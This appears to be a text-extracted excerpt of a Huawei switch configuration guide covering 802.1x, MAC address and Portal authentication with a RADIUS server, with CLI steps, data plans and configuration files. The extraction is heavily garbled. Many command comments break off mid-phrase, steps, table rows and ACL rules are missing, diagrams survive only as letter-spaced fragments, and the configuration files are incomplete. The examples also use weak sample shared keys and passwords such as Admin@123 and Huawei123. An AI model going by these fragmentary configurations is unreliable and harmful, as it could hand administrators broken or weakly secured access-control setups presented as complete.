[SwitchC-radius-policy] radius-server authentication 172.16.1.1 1812 source
ip-address 172.16.1.254 //Configure the IP address and port number of the
RADIUS authentication server.
[SwitchC-radius-policy] radius-server accounting 172.16.1.1 1813 source ip-
address 172.16.1.254 //Configure the IP address and port number of the
RADIUS accounting server.
[SwitchC-radius-policy] radius-server shared-key cipher Admin@123 //Set
[SwitchC-radius-policy] quit
[SwitchC] aaa //Enter the AAA view.
[SwitchC-aaa] authentication-scheme auth //Configure the authentication
scheme auth.
[SwitchC-aaa-authen-auth] authentication-mode radius //Set the
[SwitchC-aaa-authen-auth] quit
[SwitchC-aaa] accounting-scheme acco //Configure the accounting scheme
acco.
[SwitchC-aaa-accounting-acco] accounting-mode radius //Set the accounting
mode to RADIUS.
[SwitchC-aaa-accounting-acco] accounting realtime 15 //Set the real-time
[SwitchC-aaa-accounting-acco] quit
[SwitchC-aaa] domain portal //Configure a domain.
[SwitchC-aaa-domain-portal] authentication-scheme auth //Bind the
[SwitchC-aaa-domain-portal] accounting-scheme acco //Bind the accounting
[SwitchC-aaa-domain-portal] radius-server policy //Bind the RADIUS server
[SwitchC-aaa-domain-portal] quit
[SwitchC-aaa] quit
[SwitchC] domain portal //Configure portal as the global default domain.

[SwitchC] web-auth-server portal_huawei //Configure the Portal server
[SwitchC-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
[SwitchC-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
[SwitchC-web-auth-server-portal_huawei] port 50200 //Set the destination
[SwitchC-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
[SwitchC-web-auth-server-portal_huawei] url http://access.example.com:8080/
[SwitchC-web-auth-server-portal_huawei] quit
[SwitchC] web-auth-server listening-port 2000 //Configure the port number
[SwitchC] portal quiet-period //Enable the quiet function for Portal


[SwitchC] portal quiet-times 5 //Configure the maximum number of
[SwitchC] portal timer quiet-period 240 //Set the quiet period to 240
seconds.
4. Enable Portal authentication.

[SwitchC] authentication unified-mode //Set the NAC mode to unified. By
default, the unified mode is enabled. After the NAC mode is changed, save the
configuration and restart the device to make the configuration take effect.
[SwitchC-Vlanif101] authentication portal //Enable Portal authentication
on the interface.
[SwitchC-Vlanif101] web-auth-server portal_huawei direct //Bind the Portal
[SwitchC-Vlanif102] authentication portal //Enable Portal authentication
on the interface connecting to the marketing department.
[SwitchC-Vlanif102] web-auth-server portal_huawei direct //Bind the Portal
5. Configure network access rights for the pre-authentication domain and post-
[SwitchC] authentication free-rule 1 destination ip 172.16.1.2 mask
the authentication.
[SwitchC] authentication free-rule 2 destination ip 172.16.1.3 mask
the authentication.
[SwitchC] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchC-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchC-acl-adv-3001] quit
[SwitchC] acl 3002 //Configure the post-authentication domain for
[SwitchC-acl-adv-3002] rule 1 deny ip destination 172.16.1.4 0 //Prevent
[SwitchC-acl-adv-3002] rule 3 permit ip //Allow marketing employees to
[SwitchC] quit

and press Enter.







department.

b. Click Add.
Name SW -

with the SC.

Quidway Series

the switch.

switch.

interval
(minute)


the default value.
Allowed IP 192.168.0.1/24; -
Addresses 192.168.1.1/24


d. Click OK.
different.



Name R&D employee -

authorization rule
Department R&D -



authentication.

----End
Switch Configuration File

# Configuration file of the access switch for the R&D department
#
sysname SwitchA
#
vlan batch 101
#
#
#
return
# Configuration file of the access switch for the marketing department

#
sysname SwitchB
#
vlan batch 102
#
#
#
return

#
sysname SwitchC
#
#
domain portal
#
dhcp enable
#
radius-server shared-key cipher %#%#lJIB8CQ<:A;x$h2V5+;+C>HwC+@XAL)ldpQI}:$X%#%#
radius-server authentication 172.16.1.1 1812 source ip-address 172.16.1.254
weight 80
radius-server accounting 172.16.1.1 1813 source ip-address 172.16.1.254 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 3 permit ip
#
port 50200

source-ip 172.16.1.254
#
aaa
domain portal
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
web-auth-server portal_huawei direct
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif103
ip address 172.16.1.254 255.255.255.0
#
#
#
#
portal quiet-period
#
return
10.5.3 Example for Configuring 802.1x and MAC Address

Authentication to Control Internal User Access to the Enterprise
Network (Authentication Point on Access Switch)
Overview
802.1x authentication and MAC address authentication are two methods used for Network
Admission Control (NAC). 802.1x authentication is implemented based on interfaces and
MAC address authentication is implemented based on interfaces and MAC addresses. Both
protocols can protect security for enterprise networks.
802.1x authentication is more secure than MAC address authentication; however, it requires
that 802.1x client software be installed on all user terminals, allowing low networking

flexibility. 802.1x authentication is applicable to the networks requiring high information

security.
MAC address authentication does not need 802.1x client software, but user terminals' MAC
addresses must be registered on the authentication server. Network configuration and
management is complex. MAC address authentication is applicable to dumb terminals such as
printers and fax machine.
Configuration Notes
l NOTE
Switches.
l Huawei's Agile Controller in V100R001C00 functions as the RADIUS server in this
example. For the Agile Controller, the minimum version required is V100R001C00.
l By default, the switch allows the packets from RADIUS server to pass. You do not need
to configure authentication-free rules for the server on the switch.
l If NAC authentication is enabled on an interface, the following commands cannot be
Command Function

interface.

interface.



Enterprises have high requirements on network security. To prevent unauthorized access and
protect information security, an enterprise requests users to pass identity authentication and
security check before they access the enterprise network. Only authorized users are allowed to
access the enterprise network.

In addition, dumb terminals, such as IP phones and printers, can access the enterprise network
only after passing authentication.
The enterprise network has the following characteristics:
l All access switches support 802.1x authentication.

l The enterprise network has a small size and does not have branch networks.
l The enterprise has no more than 1000 employees. A maximum of 2000 users, including
guests, access the network every day.
l Dumb terminals, such as IP phones and printers, are connected to the enterprise network.
To provide high security for the network, you are advised to configure the 802.1x
authentication function on access switches and connect a single centralized authentication
server to the aggregation switch in bypass mode. MAC address authentication needs to be
configured for dumb terminals.
Figure 10-37 Wired access networking diagram
Pre-authentication domain Post-authentication domain

192.168.100.100 192.168.102.100
Agile Controller Service server

(RADIUS and Portal) (Key network resources)
Core layer GE0/0/6

GE0/0/5 Aggregation layer
Internet
SwitchA
Campus egress GE0/0/1 GE0/0/2
Access layer GE0/0/3 GE0/0/3

Access layer
SwitchC
SwitchD
GE0/0/1 GE0/0/2 GE0/0/1 GE0/0/2
Authentication point
802.1X authentication
packets
MAC authentication Fixed Dumb Fixed Dumb
packets terminal terminal terminal terminal
Data Plan

Item Data
Agile Controller IP address: 192.168.100.100
Post-authentication domain IP address: 192.168.102.100

server

Item Data
Aggregation switch (SwitchA) Management IP address: 192.168.10.10
Access switch (SwitchC) l User VLAN ID: 10

l Management IP address: 192.168.30.30
Access switch (SwitchD) l User VLAN ID: 20

l Management IP address: 192.168.40.40
Table 10-10 Access switch service data plan

Item Data
RADIUS scheme l Authentication server IP address: 192.168.100.100

l Authentication server port number: 1812
l Accounting server IP address: 192.168.100.100
l Accounting server port number: 1813
l Shared key for the RADIUS server: Huawei@2014
l Accounting interval: 15 minutes
l Authentication domain: isp
ACL number of the post- 3002

Table 10-11 Agile Controller service data plan

Item Data
Department R&D department
Access user User name: A

Wired access account: A-123
Password: Huawei123
Device group Wired device group: Switch
Switch IP address l SwitchC: 192.168.30.30

l SwitchD: 192.168.40.40
RADIUS authentication key Huawei@2014
RADIUS accounting key Huawei@2014

1. Configure the access switches, including the VLANs interfaces belong to, parameters for
connecting to the RADIUS server, enabling NAC authentication, and access right to the
post-authentication domain.
NOTE
Ensure the reachable routes between the access switches (SwitchC and SwitchD), aggregation switch
(SwitchA), and Agile Controller server.
b. Add an account to the Agile Controller.
c. Add switches to the Agile Controller.
d. Configure authentication rules, authorization results, and authorization rules on the
Agile Controller.
Procedure
Step 1 Configure the access switches. This example uses SwitchC to describe the configuration. The
domain configuration on SwitchD is the same as that on SwitchC.
forwarded.
[SwitchC] vlan batch 10
[SwitchC] interface gigabitethernet 0/0/1 //Configure the interface
connected to fixed terminals.
connected to dumb terminals.
connected to SwitchA.
[SwitchC-Vlanif10] ip address 192.168.30.30 24 //Configure the IP address
used to communicate with the Controller.

[SwitchC] radius-server template rd1
[SwitchC-radius-rd1] radius-server authentication 192.168.100.100 1812
[SwitchC-radius-rd1] radius-server accounting 192.168.100.100 1813
[SwitchC-radius-rd1] radius-server shared-key cipher Huawei@2014
[SwitchC-radius-rd1] quit
# Create an AAA authentication scheme abc and set the authentication mode to
RADIUS.
[SwitchC] aaa
[SwitchC-aaa] authentication-scheme abc
[SwitchC-aaa-authen-abc] authentication-mode radius
[SwitchC-aaa-authen-abc] quit

# Configure the accounting scheme acco1 and set the accounting mode to RADIUS.
[SwitchC-aaa] accounting-scheme acco1
[SwitchC-aaa-accounting-acco1] accounting-mode radius
[SwitchC-aaa-accounting-acco1] accounting realtime 15 //Set the real-time
[SwitchC-aaa-accounting-acco1] quit
# Create an authentication domain isp, and bind the AAA authentication scheme abc,
accounting scheme acco1, and RADIUS server template rd1 to the domain.
[SwitchC-aaa] domain isp
[SwitchC-aaa-domain-isp] authentication-scheme abc
[SwitchC-aaa-domain-isp] accounting-scheme acco1
[SwitchC-aaa-domain-isp] radius-server rd1
[SwitchC-aaa-domain-isp] quit
[SwitchC-aaa] quit
# Configure isp as the global default domain. During access authentication, enter a user
name in the format user@isp to perform AAA authentication in the domain isp. If the
user name does not contain a domain name or contains an invalid domain name, the user
is authenticated in the default domain.
[SwitchC] domain isp
3. Enable 802.1x and MAC address authentication.

[SwitchC] authentication unified-mode
NOTE
By default, the unified mode is enabled. After the NAC mode is changed, save the configuration and
restart the device to make the configuration take effect.
# Enable 802.1x authentication on GE0/0/1.

[SwitchC] interface gigabitEthernet 0/0/1
[SwitchC-GigabitEthernet0/0/1] authentication dot1x
# Enable MAC address authentication on GE0/0/2.

[SwitchC] interface gigabitEthernet 0/0/2
[SwitchC-GigabitEthernet0/0/2] authentication mac-authen
[SwitchC-GigabitEthernet0/0/2] mac-authen username fixed A-123 password
cipher Huawei123 //Set the user name mode for MAC address authentication
to fixed user name. Set the user name to A-123 and password to Huawei123.
4. Configure ACL 3002 for the post-authentication domain.

[SwitchC] acl 3002
[SwitchC-acl-adv-3002] rule 1 permit ip destination 192.168.102.100 0
[SwitchC-acl-adv-3002] rule 2 deny ip destination any

and press Enter.




2. Create a department and account.



department.

3. Add switches to the Agile Controller so that the switches can communicate with the
Agile Controller.
b. Click Permission Control Device Group in the navigation tree, and click and
Add SubGroup to create a device group Switch.
c. Click the device group in the navigation tree and select ALL Device. Click Add to
add network access devices.
d. Set connection parameters on the Add Device page.
This example uses SwitchC to describe the configuration procedure. The
configuration on SwitchD is the same as that on SwitchC except that the IP
addresses are different.

Name SwitchC -
IP Address 192.168.30.30 The interface on the switch must

communicate with the Agile Controller.
Device Huawei -
Series Quidway series
switch
Authenticatio Huawei@2014 It must be the same as the shared key of the

the switch.
Charging Huawei@2014 It must be the same as the shared key of the

switch.

interval
(minute)

e. Click Permission Control Device Group in the navigation tree, select SwitchC,
and click Move to move SwitchC to the Switch group. The configuration on
SwitchD is the same as that on SwitchC.
4. Add an authentication rule.
Authentication Rule and click Add to create an authentication rule.
b. Configure basic information for the authentication rule.
Name Access -
authentication
rule

Service Type Access service -
Authenticatio Device group Customize authentication rules based on the

n Condition Switch requirements of your network.
Please select EAP-PEAP- -

the allowed MSCHAPv2
authenticatio
n protocol

5. Add an authorization result.

Authorization Result and click Add to create an authorization result.
b. Configure basic information for the authorization result.
Name Post-authentication domain -


6. Add an authorization rule.
After a user passes the authentication, authorization phase starts. The Agile Controller
grants the user access rights based on the authorization rule.
Authorization Rule and click Add to create an authorization rule.
b. Configure basic information for the authorization rule.
Name Authorization rule for -

R&D employees
Access Device Switch -

Group
Authorization Post-authentication -
Result domain


l An employee can only access the Agile Controller server before passing the
authentication.
l After passing the authentication, the employee can access resources in the post-
l After the employee passes the authentication, run the display access-user command on
the switch. The command output shows information about the online employee.
----End


#
sysname SwitchC
#
vlan batch 10
#
domain isp
#
radius-server shared-key cipher %^%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A](%^%#
#
acl number 3002
rule 1 permit ip destination 192.168.102.100 0
rule 2 deny ip
#
aaa
accounting-scheme acco1
domain isp
radius-server rd1
#
interface Vlanif10
ip address 192.168.30.30 255.255.255.0
#
#
mac-authen username fixed A-123 password cipher %^%#7JxKWaX6c0\X4RHfJ$M6|
duQ*k{7uXu{J{S=zx-3%^%#
#
#
return

Network (Authentication Point on Aggregation Switch)
Overview
On a NAC network, the 802.1x, MAC address, and Portal authentication modes are
configured on the user access interfaces of a device to meet various authentication
requirements. Users can access the network using any authentication mode.

Configuration Notes
l NOTE
Switches.
Command Function

interface.

interface.



l The access switches on the network do not support 802.1x authentication.


To reduce network reconsutrction investment, you are advised to configure the 802.1x
authentication function on the aggregation switch and connect a single centralized
authentication server to the aggregation switch in bypass mode. MAC address authentication
needs to be configured for dumb terminals.

192.168.100.100 192.168.102.100

(Server: SM&SC&DB) (Key network resources)
Core layer GE1/0/6

Internet
SwitchA

Access layer
SwitchC SwitchD
GE0/0/1 GE0/0/2 GE0/0/1 GE0/0/2
packets
Data Plan

Item Data

server
Aggregation switch (SwitchA) l VLAN to which 1/0/6 connected to the server

belongs: VLAN 100
l VLAN to which downstream interfaces GE1/0/1
and GE1/0/2 belong: VLAN 200
Access switch (SwitchC) User VLAN ID: 200

Item Data
Access switch (SwitchD) User VLAN ID: 200
Table 10-13 Aggregation switch service data plan

Item Data



Item Data

Password: Huawei123
Switch IP address SwitchA: 192.168.10.10
1. Configure the aggregation switch, including the VLANs interfaces belong to, parameters
for connecting to the RADIUS server, enabling NAC authentication, and access right to
the post-authentication domain.
NOTE
2. Configure the access switches, including the VLANs and 802.1x transparent
transmission.


Agile Controller.
Procedure
forwarded.
[SwitchA] interface gigabitethernet 1/0/1 //Configure the interface
connected to SwitchC.
connected to SwitchD.
connected to the server.
[SwitchA-Vlanif100] ip address 192.168.10.10 24 //Configure the management
IP address for SwitchA. This IP address is used when SwitchA is added to
Agile Controller.
[SwitchA-Vlanif200] ip address 192.168.200.1 24 //Configure the gateway
address for terminal users.
[SwitchA] ip route-static 192.168.100.0 255.255.255.0 192.168.10.10 //
Configure a route to the network segment where the pre-authentication domain
resides.
Configure a route to the network segment where the post-authentication domain
resides.
[SwitchA] radius-server template rd1
[SwitchA-radius-rd1] radius-server authentication 192.168.100.100 1812
[SwitchA-radius-rd1] radius-server accounting 192.168.100.100 1813
[SwitchA-radius-rd1] radius-server shared-key cipher Huawei@2014
[SwitchA-radius-rd1] quit
RADIUS.
[SwitchA] aaa
[SwitchA-aaa] authentication-scheme abc
[SwitchA-aaa-authen-abc] authentication-mode radius
[SwitchA-aaa-authen-abc] quit

# Configure an accounting scheme acco1. Set the accounting mode to RADIUS so that
the RADIUS server can maintain account status, such as login, log-off and forced log-
off.
[SwitchA-aaa] accounting-scheme acco1
[SwitchA-aaa-accounting-acco1] accounting-mode radius
[SwitchA-aaa-accounting-acco1] accounting realtime 15 //Set the real-time
[SwitchA-aaa-accounting-acco1] quit
[SwitchA-aaa] domain isp
[SwitchA-aaa-domain-isp] authentication-scheme abc
[SwitchA-aaa-domain-isp] accounting-scheme acco1
[SwitchA-aaa-domain-isp] radius-server rd1
[SwitchA-aaa-domain-isp] quit
[SwitchA-aaa] quit
# Configure the global default domain isp. During access authentication, enter a user
[SwitchA] domain isp

[SwitchA] authentication unified-mode
NOTE
# Enable 802.1x and MAC address authentication on GE1/0/1 and GE1/0/2.

[SwitchA-Gigabitethernet1/0/1] authentication dot1x mac-authen //Configure
a combination of 802.1x and MAC address authentication.
[SwitchA-Gigabitethernet1/0/1] mac-authen username fixed A-123 password
[SwitchA-Gigabitethernet1/0/1] quit
[SwitchA-Gigabitethernet1/0/2] authentication dot1x mac-authen //Configure
a combination of 802.1x and MAC address authentication.
[SwitchA-Gigabitethernet1/0/2] mac-authen username fixed A-123 password

[SwitchA] acl 3002
[SwitchA-acl-adv-3002] rule 1 permit ip destination 192.168.102.100 0
[SwitchA-acl-adv-3002] rule 2 deny ip destination any
[SwitchA-acl-adv-3002] quit
Step 2 Configure the access switches.

forwarded. This example uses SwitchC to describe the configuration. The configuration
on SwitchD is the same as that on SwitchC.
# Create VLAN 200.


# Configure the interface connected to users as an access interface and add the interface
to VLAN 200.
# Configure the interface connected to the upstream network as a trunk interface and
configure the to allow VLAN 200.
2. Configure the device to transparently transmit 802.1x packets. This example uses
SwitchC to describe the configuration. The configuration on SwitchD is the same as that
on SwitchC.
NOTE
In this example, SwitchC and SwitchD are deployed between the authentication switch SwitchA and
users. EAP packet transparent transmission needs to be configured on SwitchC and SwitchD so that
SwitchA can perform 802.1x authentication for users.
– Method 1:
[SwitchC] l2protocol-tunnel user-defined-protocol 802.1X protocol-mac
0180-c200-0003 group-mac 0100-0000-0002
[SwitchC-GigabitEthernet0/0/1] l2protocol-tunnel user-defined-protocol
802.1X enable
[SwitchC-GigabitEthernet0/0/1] bpdu enable
802.1X enable
802.1X enable
– Method 2: This method is recommended when a large number of users exist or high
network performance is required.
[SwitchC] undo bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFF0
[SwitchC] bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
[SwitchC] bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
[SwitchC] bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
[SwitchC] bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
This following step is mandatory when you switch from method 1 to method 2.
[SwitchC-GigabitEthernet0/0/1] undo l2protocol-tunnel user-defined-
protocol 802.1X enable


and press Enter.






department.

Agile Controller.

Name SwitchA -

Device Huawei -
switch

the switch.

switch.

interval
(minute)

and click Move to move SwitchA to the Switch group. The configuration on
Name Access -
authentication
rule



authenticatio
n protocol





R&D employees

Group
Result domain


authentication.
----End

Configuration Files
#
sysname SwitchA
#
vlan batch 100 200
#
domain isp
#
radius-server shared-key cipher %^%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A]
(%^%#
#
acl number 3002
rule 2 deny ip
#
aaa
domain isp
radius-server rd1
#
interface Vlanif100
ip address 192.168.10.10 255.255.255.0
#
interface Vlanif200
ip address 192.168.200.1 255.255.255.0
#
authentication dot1x mac-authen
#
authentication dot1x mac-authen
#
#
ip route-static 192.168.100.0 255.255.255.0 192.168.10.10
ip route-static 192.168.102.0 255.255.255.0 192.168.10.10
#
return

#
sysname SwitchC
#
vlan batch 200
#
l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003
group-mac 0100-0000-0002
#

l2protocol-tunnel user-defined-protocol 802.1x enable
#
#
#
return
10.6 Typical NAC Configuration (Unified Mode) (the

Agile Controller as the Authentication Server)

Point on Core Switch)
network services.
complex.
Configuration Notes
l NOTE
Switches.
V100R001C00.

l To facilitate network reconstruction and reduce investments, the enterprise requires the
authentication point be deployed on the core switch.
Figure 10-39 Portal authentication deployed at the core layer

P re -a u th e n tica tio n
d o m a in
In te rn e t

D N S se rve r (in clu d e s P o rta l a n d W e b se rve r
R A D IU S se rve rs)
C o re sw itch
G E 1 /0 /2 P o st-a u th e n tica tio n
S w itc h D
d o m a in
G E 1 /0 /1
A g g re g a tio n
G E 1 /0 /3
sw itch
S w itc h C Code
Issu e tra ckin g
co n fig u ra tio n
G E 1 /0 /1 G E 1 /0 /2 syste m
b a se
G E 0 /0 /2 G E 0 /0 /2
A cce ss sw itch
G E 0 /0 /1 G E 0 /0 /1
R & D D e p t. M a rke tin g

D e p t.
G E 0 /0 /
4
A u th e n tica tio n p o in t
PC PC L a p to p PC

VLAN Plan

VLAN ID Function
103 VLAN for connection between the

aggregation switch and core switch

servers belong
Network Data Plan


department)
VLAN: 101 switch.

VLAN: 102 switch.


Interface number: GE1/0/3 Connects to the core switch.

VLAN: 103
172.16.2.1

Core switch Interface number: GE1/0/1 Connects to the aggregation

VLAN: 103 switch.
172.16.2.2
Interface number: GE1/0/2 Connects to the server area

VLAN: 104 and functions as the gateway
for the servers.
172.16.1.254

Controller
(RADIUS
server +
Portal
server)

server

library

tracking
system
Service Data Plan

Core switch Number of the ACL for R&D You need to enter this ACL


key: Admin@123
accounting server.

switch.




l User: B B-123.
l Account: B-123


domain Internet
1. Configure the access switch, aggregation switch, and core switch to ensure network
connectivity.
2. Configure Portal authentication on the core switch to implement user access control.
Configure parameters for connecting to the RADIUS server and those for connecting to
the Portal server, enable Portal authentication, and configure network access rights for
the pre-authentication domain and post-authentication domain.
Procedure
[SwitchA] vlan 101
department


aggregation switch
[SwitchA] quit

[SwitchA] vlan 101
department
aggregation switch
[SwitchA] quit
Step 3 Configure the core switch.

forwarded.
aggregation switch
[SwitchD-GigabitEthernet1/0/1] port trunk allow-pass vlan 103
[SwitchD-Vlanif103] ip address 172.16.2.2 255.255.255.0
server area
[SwitchD-Vlanif104] ip address 172.16.1.254 255.255.255.0 //Configure the
routes to the network segment assigned to the R&D department.
routes to the network segment assigned to the marketing department.
[SwitchD] quit

[SwitchD] radius-server template policy //Create the RADIUS server
template policy.
[SwitchD-radius-policy] radius-server authentication 172.16.1.1 1812 //
Configure the IP address and port number of the RADIUS authentication server.

[SwitchD-radius-policy] radius-server accounting 172.16.1.1 1813 //

Configure the IP address and port number of the RADIUS accounting server.
[SwitchD-radius-policy] radius-server shared-key cipher Admin@123 //Set
[SwitchD-radius-policy] quit
[SwitchD] aaa //Enter the AAA view.
[SwitchD-aaa] authentication-scheme auth //Configure the authentication
scheme auth.
[SwitchD-aaa-authen-auth] authentication-mode radius //Set the
[SwitchD-aaa-authen-auth] quit
[SwitchD-aaa] accounting-scheme acco //Configure the accounting scheme
acco.
[SwitchD-aaa-accounting-acco] accounting-mode radius //Set the accounting
mode to RADIUS.
[SwitchD-aaa-accounting-acco] accounting realtime 15 //Set the real-time
[SwitchD-aaa-accounting-acco] quit
[SwitchD-aaa] domain portal //Configure a domain.
[SwitchD-aaa-domain-portal] authentication-scheme auth //Bind the
[SwitchD-aaa-domain-portal] accounting-scheme acco //Bind the accounting
[SwitchD-aaa-domain-portal] radius-server policy //Bind the RADIUS server
[SwitchD-aaa-domain-portal] quit
[SwitchD-aaa] quit
[SwitchD] domain portal //Configure portal as the global default domain.

[SwitchD] web-auth-server portal_huawei //Configure the Portal server
[SwitchD-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
[SwitchD-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
[SwitchD-web-auth-server-portal_huawei] port 50200 //Set the destination
[SwitchD-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
[SwitchD-web-auth-server-portal_huawei] url http://access.example.com:8080/
[SwitchD-web-auth-server-portal_huawei] quit
[SwitchD] web-auth-server listening-port 2000 //Configure the port number
[SwitchD] portal quiet-period //Enable the quiet function for Portal
[SwitchD] portal quiet-times 5 //Configure the maximum number of
[SwitchD] portal timer quiet-period 240 //Set the quiet period to 240
seconds.
4. Enable Portal authentication and configure network access rights for users in the pre-
authentication domain and post-authentication domain.


[SwitchD] authentication unified-mode //Set the NAC mode to unified. By
default, the switch works in unified mode. After changing the NAC mode from
common to unified, save the configuration and restart the switch to make the
configuration take effect.
# Configure a Portal access profile.

[SwitchD] portal-access-profile name web1
[SwitchD-portal-acces-profile-web1] web-auth-server portal_huawei layer3
[SwitchD-portal-acces-profile-web1] quit
# Configure an authentication-free rule profile and specify network access rights for
users in the pre-authentication domain.
[SwitchD] free-rule-template name default_free_rule
[SwitchD-free-rule-default_free_rule] free-rule 1 destination ip 172.16.1.2
mask 255.255.255.255 //Configure authentication-free rules for Portal
the authentication.
[SwitchD-free-rule-default_free_rule] free-rule 2 destination ip 172.16.1.3
the authentication.
[SwitchD-free-rule-default_free_rule] quit
# Configure an authentication profile.

[SwitchD] authentication-profile name p1
[SwitchD-authen-profile-p1] portal-access-profile web1 //Bind the Portal
access profile web1.
[SwitchD-authen-profile-p1] quit

[SwitchD-Vlanif103] authentication-profile p1
# Configure network access rights for the post-authentication domain.

[SwitchD] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchD-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchD] acl 3002 //Configure the post-authentication domain for
[SwitchD-acl-adv-3002] rule 3 permit ip //Allow marketing employees to
[SwitchD] quit

and press Enter.







department.

b. Click Add.
Name SW -

with the SC.

Quidway Series

the switch.

switch.

interval
(minute)


the default value.
Allowed IP 192.168.0.1/24; -
Addresses 192.168.1.1/24


d. Click OK.
different.



Name R&D employee -

authorization rule
Department R&D -



authentication.

----End
Configuration Files
# Configuration file of the access switch for the employee department (The configuration file
of the access switch for the marketing department is similar.)
#
sysname SwitchA
#
vlan batch 101
#
#
#
return

#
sysname SwitchC
#
#
dhcp enable
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif103
ip address 172.16.2.1 255.255.255.0
#
#
#
#
ip route-static 172.16.1.0 255.255.255.0 172.16.2.2
#
return
# Configuration file of the core switch

#
sysname SwitchD

#
#
#
domain portal
#
radius-server shared-key cipher %#%#1*yT+0O\X;V}hP,G^TMN7mTXA^mIz)SoR:86;lNK%#%#
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 3 permit ip
#
free-rule-template name default_free_rule
free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
#
port 50200
source-ip 172.16.1.254
#
portal-access-profile name web1
web-auth-server portal_huawei layer3
#
aaa
domain portal
#
interface Vlanif103
ip address 172.16.2.2 255.255.255.0
#
interface Vlanif104
ip address 172.16.1.254 255.255.255.0
#
#
#
ip route-static 192.168.0.0 255.255.255.0 172.16.2.1
ip route-static 192.168.1.0 255.255.255.0 172.16.2.1
#
portal quiet-period
#
return


Point on Aggregation Switch) (V200R007C20, V200R009C00 and
Later Versions)

network services.

complex.
Configuration Notes
l NOTE
Switches.
V100R001C00.

l Moderate security control is required. To facilitate maintenance, a moderate number of
authentication points need to be deployed on the aggregation switch.

Figure 10-40 Portal authentication deployed at the aggregation layer
In te rn e t
P re -a u th e n tic a tio n
d o m a in
C o re s w itc h
A g ile C o n tro lle r W eb
D N S s e rv e r
(in c lu d e s P o rta l a n d s e rv e r
R A D IU S s e rv e rs)
A g g re g a tio n s w itc h G E 1 /0 /3
P o s t-a u th e n tic a tio n
S w itc h C
G E 1 /0 /1 d o m a in
G E 1 /0 /2
C ode
Is s u e tra c k in g
c o n fig u ra tio n
G E 0 /0 /2 G E 0 /0 /2 s y s te m
base
S w itc h A A c c e s s s w itc h S w itc h B
G E 0 /0 /1 G E 0 /0 /1
M a rk e tin g
R & D D e p t.
D e p t.
A u th e n tic a tio n p o in t
PC PC L a p to p PC
VLAN Plan

VLAN ID Function

servers belong

Network Data Plan


department)
VLAN: 101 switch.

VLAN: 102 switch.


Interface number: GE1/0/3 Connects to the enterprise

VLAN: 103 server area.
172.16.1.254 servers.

Controller
(RADIUS
server +
Portal
server)

server

library

tracking
system

Service Data Plan

Aggregation Number of the ACL for R&D You need to enter this ACL
switch employees' post-authentication number when configuring

key: Admin@123
accounting server.


switch.



l User: B B-123.
l Account: B-123


domain Internet
1. Configure the access switch and aggregation switch to ensure network connectivity.
2. Configure Portal authentication on the aggregation switch to implement user access
control. Configure parameters for connecting to the RADIUS server and those for
connecting to the Portal server, enable Portal authentication, and configure network
access rights for the pre-authentication domain and post-authentication domain.

Procedure
marketing department, is similar.
[SwitchA] vlan 101
department
aggregation switch
[SwitchA] quit

forwarded.
segment assigned to R&D employees
segment assigned to marketing employees.
[SwitchC] interface gigabitethernet 1/0/3 //Interface connected to the
server area
[SwitchC-Vlanif103] ip address 172.16.1.254 255.255.255.0 //Configure the
[SwitchC] quit


[SwitchC] radius-server template policy //Create the RADIUS server
template policy.
[SwitchC-radius-policy] radius-server authentication 172.16.1.1 1812 source
ip-address 172.16.1.254 //Configure the IP address and port number of the
RADIUS authentication server.
[SwitchC-radius-policy] radius-server accounting 172.16.1.1 1813 source ip-
address 172.16.1.254 //Configure the IP address and port number of the
RADIUS accounting server.
[SwitchC-radius-policy] radius-server shared-key cipher Admin@123 //Set
[SwitchC-radius-policy] quit
[SwitchC] aaa //Enter the AAA view.
[SwitchC-aaa] authentication-scheme auth //Configure the authentication
scheme auth.
[SwitchC-aaa-authen-auth] authentication-mode radius //Set the
[SwitchC-aaa-authen-auth] quit
[SwitchC-aaa] accounting-scheme acco //Configure the accounting scheme
acco.
[SwitchC-aaa-accounting-acco] accounting-mode radius //Set the accounting
mode to RADIUS.
[SwitchC-aaa-accounting-acco] accounting realtime 15 //Set the real-time
[SwitchC-aaa-accounting-acco] quit
[SwitchC-aaa] domain portal //Configure a domain.
[SwitchC-aaa-domain-portal] authentication-scheme auth //Bind the
[SwitchC-aaa-domain-portal] accounting-scheme acco //Bind the accounting
[SwitchC-aaa-domain-portal] radius-server policy //Bind the RADIUS server
[SwitchC-aaa-domain-portal] quit
[SwitchC-aaa] quit
[SwitchC] domain portal //Configure portal as the global default domain.

[SwitchC] web-auth-server portal_huawei //Configure the Portal server
[SwitchC-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
[SwitchC-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
[SwitchC-web-auth-server-portal_huawei] port 50200 //Set the destination
[SwitchC-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
[SwitchC-web-auth-server-portal_huawei] url http://access.example.com:8080/
[SwitchC-web-auth-server-portal_huawei] quit
[SwitchC] web-auth-server listening-port 2000 //Configure the port number
[SwitchC] portal quiet-period //Enable the quiet function for Portal


[SwitchC] portal quiet-times 5 //Configure the maximum number of
[SwitchC] portal timer quiet-period 240 //Set the quiet period to 240
